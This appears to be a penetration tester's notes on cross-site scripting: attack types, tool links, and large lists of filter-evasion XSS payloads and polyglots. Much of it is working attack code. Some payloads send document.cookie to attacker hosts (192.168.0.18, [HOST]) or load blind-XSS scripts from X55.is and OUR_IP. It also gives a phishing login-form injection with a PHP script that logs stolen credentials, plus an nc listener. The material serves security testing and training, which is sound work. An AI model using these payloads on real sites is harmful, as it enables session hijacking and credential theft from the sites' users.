XSS

Xmind AIxmind.ai

Types of attack

• Cookie Stealing

• Keylogging

• Webcam snapshot

• Phishing

• Port Scanning

• Other browser based exploits - There are millions of possibilities with XSS.

Types of XSS

Type	Description
Stored (Persistent) XSS	The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)
Reflected (Non-Persistent) XSS	Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)
DOM-based XSS	Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)

Cheatsheet

Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security AcademyWebSecAcademy

Extension to incorporate XSS Cheatsheet in Burp

GitHub - PortSwigger/xss-cheatsheetGitHub

Fuzzing

Fuzzing

Reflected Parameters

GitHub - Emoe/kxss: This a adaption of tomnomnom's kxss tool with a different output formatGitHub

GitHub - rootDR/ex-param: ex-param is an automated tool designed for finding reflected parameters for XSS vulnerabilities. It crawls a target website, extracts GET parameters, and tests them for reflected input. The tool helps bug bounty hunters and penetration testers quickly identify potential reflected XSS flaws, offering fast and reliable results.GitHub

Chrome extension

GitHub - ch1y0w0/ParamScan: ParamScan is a chrome extension for finding reflected parameters in a webpage.GitHub

Basic Payloads

Polyglot payload - All in one

1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; >

1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >

1'"<S><Input Value=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >

Source: https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/

Grep - Match 1337: https://portswigger.net/burp/documentation/desktop/tools/intruder/uses/fuzzing

1. Try to start the payloads with a single quote ' or a double quote ".

2. Also try with, >, '> and ">

3. Check the source code to close the appropriate tag if necessary

 JavaScript​://%250Aalert?.(1337)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/<​/Style/<​/Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus​= /*${/*/;{/**/(alert)(1337)}//><Base/Href=//hello\76-->
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1337%6K</Scri%7Kt>
"%26%2339>alert(1337)>%26%2339<Svg>
<script>alert(1337);</script>
<sc<script>ript>alert(1337);</script>
<sCriPt>alert(1337);</sCriPt>
<button onmouseover="alert(1337);">xss</button>
<button onclick="alert(1337);">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert(1337)">
<img src="x" onerror="alert(1337)">
<img src="x" onerror="alert(1337);"
<img src="#" onerror="&#97;&#108;&#101;&#114;&#116;(1337)">
<img src="#" onerror="al&#x65;rt(1337)">
<img src="#" onerror="eval('alert(1337)')">
<img src onerror %09=top['ale'%2b'rt'](1337)>
<iframe src="javascript:alert(`1337`)">
testfmy90"onfocus%3d"alert(1337)"autofocus%3d"ed3vz
<script>alert(1337)</script>
<Script>alert(1337)</Script>
<sCript>alert(1337)</sCript>
<script>alert(1337);</script>
<script>alert("1337");</script>
<script>alert(1337)</script>
</script><script>alert(1337)</script>
\&#34;+confirm(1337)+&#34; 
//%01javascript:alert(1337)
%09Jav%09ascript:alert(1337)
/%09/javascript:alert(1337)
/%09/javascript:alert(1337);
//%0Aalert(1337)
////%0Aalert(1337)
//%0D%0Aalert(1337)
/%5cjavascript:alert(1337)
/%5cjavascript:alert(1337);
//%5cjavascript:alert(1337)
//%5cjavascript:alert(1337);
";alert(1337);//
";alert(1337);//bash
java%0d%0ascript%0d%0a:alert(1337)
javascript://%0aalert(1337)
javascript://%00alert(1337)
javascript://%0aalert(1337)
javascript://%0Aalert(1337)
javascript://%250A1?alert(1337):0
javascript://%250Aalert(1337)
javascript://%250Aalert(1337)//?1
javascript:alert(1337)
//javascript:alert(1337)
//javascript:alert(1337);
/javascript:alert(1337)
/javascript:alert(1337);
<>javascript:alert(1337);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1337\)
javascript:alert(1337)
javascript:alert(1337);
javascript:alert(1337)%0d%0a
javascript:confirm(1337)
javascript:prompt(1337)
javascript:void(0);alert(1337)
/x:1/:///%01javascript:alert(1337)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1337)//
JavaScript://%250Dtop.confirm?.(1337)//
1'-top['con\146irm'](1337)-'
/confirm?.(1337)//\
test"/><output name="result" onclick="alert(1337)">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1337)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(1337)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1337)%26gt;>
%22%20onmouseover=alert(1337)%20x=%22
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1337)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1337)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1337)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert(1337)%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert(1337)//%3E%5Cx3e
<script\x20type="text/javascript">javascript:alert(1337);</script>
<script\x3Etype="text/javascript">javascript:alert(1337);</script>
<script\x0Dtype="text/javascript">javascript:alert(1337);</script>
<script\x09type="text/javascript">javascript:alert(1337);</script>
<script\x0Ctype="text/javascript">javascript:alert(1337);</script>
<script\x2Ftype="text/javascript">javascript:alert(1337);</script>
<script\x0Atype="text/javascript">javascript:alert(1337);</script>
'`"><\x3Cscript>javascript:alert(1337)</script>        
'`"><\x00script>javascript:alert(1337)</script>
<img src=1 href=1 onerror="javascript:alert(1337)"></img>
<audio src=1 href=1 onerror="javascript:alert(1337)"></audio>
<video src=1 href=1 onerror="javascript:alert(1337)"></video>
<body src=1 href=1 onerror="javascript:alert(1337)"></body>
<image src=1 href=1 onerror="javascript:alert(1337)"></image>
<object src=1 href=1 onerror="javascript:alert(1337)"></object>
<script src=1 href=1 onerror="javascript:alert(1337)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1337)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1337)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1337)"></iframe onLoad>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a(1337)%20x>
<audio controls onwaiting=alert(1337)><source src=x type=x></audio>
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/
<K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
<section onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></section>
</<K><Svg Onload=alert(1337)>
</<Kno XSS="><Svg Onload=alert(1337)>
<!<K><Svg Onload=alert(1337)>
<!<Kno XSS="><Svg Onload=alert(1337)>
<a href="javascript:alert(1337)">show</a>
<a href="data:text/html;base64,<alert(1337) encoded>"show</a>
<form action="javascript:alert(1337)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1337)">send</button>
<object data="javascript:alert(1337)">
<object data="data:text/html;base64, <alert(1337) encoded>">
<body onload=alert(1337)>
<input type=image src=x:x onerror=alert(1337)>
<isindex onmouseover="alert(1337)" >
<form oninput=alert(1337)><input></form>
<texarea autofocus onfocus=alert(1337)>
<input oncut=alert(1337)>
<svg onload=alert(1337)>
<keygen autofocus onfocus=alert(1337)">
<video><source onerror="alert(1337)">
<marquee onstart=alert(1337)>
<svg/onload=alert(1337)>
<svg//////onload=alert(1337)>
<svg id=x; onload=alert(1337)>
<svg onload%09=alert(1337)>
<svg %09onload=alert(1337)>
<svg %09onload%20=alert(1337)>
<svg onload%09%20%28%2C%3B=alert(1337)>
<svg onload%0B=alert(1337)>
<svg id='x' onload=alert(1337)>
<script>\u0061lert(1337)</script>
<script>\u0061\u006\u0065\u0072\u0074(1337)</script>
<script>eval("\u0061lert(1337)")</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0033\u0033\u0037\u0029")</script>
<img src=x onerror="\u0061lert(1337)"/>
<img src=x onerror="eval('\141lert(1337)')"/>
<img src=x onerror="eval('\x61lert(1337)')"/>
<img src=x onerror="eval('&#x0061;lert(1337)')"/>
<img src=x onerror="eval('&#97;lert(1337)')"/>
<img src=x onerror="eval('\a\l\ert(1\)')"/>
<img src=x onerror="eval('\a\l\ert(1\3\3\7\)')"/>
<object data="JaVScRiPt:alert(1337)">
<object data="javascript&colon;:alert(1337)">
<object data="javascript&#x003A;alert(1337)">
<object data="javascript&#58;alert(1337)">
<object data="&#x6A;avascript:alert(1337)">
<object data="data:text/html,<script>alert(1337)</script>">
<embed code="DaTa:text/html,<script>alert(1337)</script>">
<embed code="data&colon;text/html,<script>alert(1337)</script>">
<embed code="data&#x003A;text/html,<script>alert(1337)</script>">
<embed code="&#x64;&#x61;ta:text/html,<script>alert(1337)</script>">
<scr<iframe>ipt>alert(1337)</script>
<scr<script>ipt>alert(1337)</script>
<svg/onload=alert(1337)
"><svg/onload=alert(1337)>
";alert(1337);//
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
<Img Src=OnXSS OnError=alert(1337)> 
confirm?.(1337)
<svg/onload=window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)>
<svg/onload=document['default'+'View'][`\u0061lert`](1337)>
<svg/onload=parent[/al/.source+/ert/.source](1337)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](1337)>
<svg/onload=(function(x){this[x+`ert`](1337)})`al`>
"&quot;"ontoggle=alert(1337)
"' &quot;'"ontoggle=alert1337
1%27/prompt?.(1337)/%27
*prompt(1337)*
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<img//////src=x oNlY=1 oNerror=alert(1337)//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1337>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1337`//>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601337\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1337`}>
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(1337),%200);})();">Click%20me!</div>
<Img Src=OnXSS OnError=confirm(1337)>
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/1337/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto">
test" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto
test" oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto

Payload List

</Scri%7Kt><Scri%7Kt>%7Krompt%6K1%6K</Scri%7Kt>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
"%26%2339>alert(1)>%26%2339<Svg>
<script>alert('xss');</script>
<sc<script>ript>alert('xss');</script>
<sCriPt>alert('xss');</sCriPt>
<button onmouseover="alert('xss');">xss</button>
<button onclick="alert('xss');">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert('xss')">
<img src="x" onerror="alert('xss')">
<img src="x" onerror="alert(document.cookie);"
<iframe src="javascript:alert(`xss`)">
testfmy90"onfocus%3d"alert(1)"autofocus%3d"ed3vz
<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
\&#34;+confirm(1)+&#34; 
//%01javascript:alert(1)
%09Jav%09ascript:alert(1)
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
//%0Aalert(1)
////%0Aalert(1)
//%0D%0Aalert(1)
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
";alert(0);//
";alert(0);//bash
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
java%0d%0ascript%0d%0a:alert(0)
javascript://%0aalert(document.cookie)
javascript://%00alert(1)
javascript://%0aalert(1)
javascript://%0Aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascript:alert(0)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascript:alert(1)%0d%0a
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
javascript:void(0);alert(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
javascript://whitelisted.com/?z=%0Aalert(1)
/x:1/:///%01javascript:alert(document.cookie)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1)//
JavaScript://%250Dtop.confirm?.(1)//
1'-top['con\146irm'](1)-'
/confirm?.(1)//\
<img src=x onerror="fetch('[HOST]' + document.cookie)" />
<script>fetch('[host]')</script>
test"/><output name="result" onclick="alert('something')">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>
%22%20onmouseover=alert(document.domain)%20x=%22
<<https:http://x55.is/onfocus=1?import(tagName):1 AutoFocus ContentEditable>>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e

Stored XSS

<script>alert(window.origin)</script>

Tip: Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of window.origin in the alert box, instead of a static value like 1. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.

<script>print()</script>

Will pop up the browser print dialog, which is unlikely to be blocked by any browser

Cookies

<script>alert(document.cookie)</script>

Reflected XSS

<div></div><ul class="list-unstyled" id="todo"><div style="padding-left:25px">Task '<script>alert(window.origin)</script>' could not be added.</div></ul>

The single quotes contain our XSS payload '<script>alert(window.origin)</script>'.

GET request sends their parameters and data as part of the URL. So, to target a user, we can send them a URL containing our payload.

http://URL/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

DOM XSS

Sink:

• document.write()

• DOM.innerHTML

• DOM.outerHTML

jQuery:

• add()

• after()

• append()

var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);

document.getElementById("todo").innerHTML = "<b>Next Task:</b> " + decodeURIComponent(task);

innerHTML function does not allow the use of the <script> tags within it as a security feature

Payload:

<img src="" onerror=alert(window.origin)>

Firefox Extension

GitHub - swoops/eval_villain: A Firefox Web Extension to improve the discovery of DOM XSS.GitHub

Blind XSS

ezXSS

GitHub - ssl/ezXSS: ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.GitHub

BeeXSS

GitHub - AnonKryptiQuz/BeeXSS: BeeXSS is a specialized automated tool designed to detect Blind XSS (Cross-Site Scripting) vulnerabilities in web applications.GitHub

XSSHunter

GitHub - trufflesecurity/xsshunterGitHub

👩‍💻 Hacker Tools: How to set up XSSHunterIntigriti

BXSS HUnter

BXSS Hunter | The XSS hunter's secret weapon

KNOXSS

Create a demo account: https://knoxss.me/

Blind XSS Custom Vector - Default

<Script /Src=https://X55.is?1=[YOUR_ID]></Script>

Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)

'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))//>

Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)

JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))}//\76-->

XSS Discovery

Burp, Nessus, ZAP

Tools

Nuclei Template

https://raw.githubusercontent.com/coffinxp/priv8-Nuclei/refs/heads/main/reflection.yaml

id: reflection
info:
    name: search for reflection in header and body
    author: roninja
    severity: low
    description: Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
    reference:
      - https://{{Hostname}}.{{interactsh-url}}
    tags: reflection,header,cookies
    metadata:
      max-request: 2
requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Referer: https://r.{{Host}}.{{interactsh-url}}
        Origin: https://o.{{Host}}.{{interactsh-url}}
        Location: https://l.{{Host}}.{{interactsh-url}}
        X-Forwarded-Host: xfh.{{Host}}.{{interactsh-url}}
        X-Forwarded-For: xff.{{Host}}.{{interactsh-url}}
        X-Host: xh.{{Host}}.{{interactsh-url}}
        X-Original-Host: xoh.{{Host}}.{{interactsh-url}}
        X-Original-URL: xou.{{Host}}.{{interactsh-url}}
        Cookie: gude=tama.{{interactsh-url}}
        Gudetama: {{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{interactsh-url}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd
    
    redirects: false
    stop-at-first-match: false
    matchers-condition: or
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: header

      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: body

Open Source

GitHub - s0md3v/XSStrike: Most advanced XSS scanner.GitHub

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 

GitHub - rajeshmajumdar/BruteXSS: BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application. This tool was originally developed by Shawar Khan in CLI. I just redesigned it and made it GUI for more convienience.GitHub

GitHub - epsylon/xsser: Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.GitHub

Other great tool:

GitHub - hahwul/dalfox: 🌙🦊 DalFox is an powerful open source XSS scanning tool and parameter analyzer, utilityGitHub

Release Page - build in - Just download

Commercial Tool - Knoxss

• https://knoxss.me/

• See Blind XSS

Manual

See Payload

Note: XSS can be injected into any input in the HTML page, which is not exclusive to HTML input fields, but may also be in HTTP headers like the Cookie or User-Agent (i.e., when their values are displayed on the page).

Defacing

Three HTML elements are usually utilized to change the main look of a web page:

• Background Color document.body.style.background

• Background document.body.background

• Page Title document.title

• Page Text DOM.innerHTML

Changing Background

<script>document.body.style.background = "#141d2b"</script>

Here we set the background color to the default Hack The Box background color. We can use any other hex value, or can use a named color like = "black".

# Change background color to red
<img src="test" onmouseover="document.body.style.backgroundColor = 'red'">

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Changing Page Title

<script>document.title = 'HackTheBox Academy'</script>

# Title defacement
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>

Changing Page Text

document.getElementById("todo").innerHTML = "New Text"

jQuery

$("#todo").html('New Text');

innerHTML

document.getElementsByTagName('body')[0].innerHTML = "New Text"

document.getElementsByTagName('body') => by specifying [0], we are selecting the first body element, which should change the entire text of the web page

<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>

Phishing

Tip: To understand which payload should work, try to view how your input is displayed in the HTML source after you add it.

Login Form Injection

Login form:

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

Payload:

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

Vicitm URL: http://SERVER_IP/phishing/index.php?url=...SNIP...

Remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove() function.

Find the id of the HTML element we want to remove:

document.getElementById('urlform').remove();

Final Payload:

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

Remove the original HTML code left after our injected login form

...PAYLOAD... <!-- 

Credential Stealing

If any victim attempts to log in with the form, we will get their credentials.

 sudo nc -lvnp 80

connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP...

Use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections

index.php:

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Start a PHP listening server,

$ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ vi index.php #at this step we wrote our index.php file
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

Session Hijacking

Lab: Exploiting cross-site scripting to steal cookies | Web Security AcademyWebSecAcademy

Using Cross Site Scripting (XSS) to Steal CookiesInfinite Logins

# Cookie stealing example
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">

Blind XSS Detection

Hunting for blind XSS vulnerabilities: A complete guideIntigriti

Payload Generator:

GitHub - jadu101/blind_xss_payload_generatorGitHub

<script src="http://OUR_IP/script.js"></script>

Identify the vulnerable input field that executed the script

<script src="http://OUR_IP/username"></script>

If we get a request for /username, then we know that the username field is vulnerable to XSS, and so on.

Also check Polyglot XSS payload

<img src="https://example.burpcollaborator.net/image">
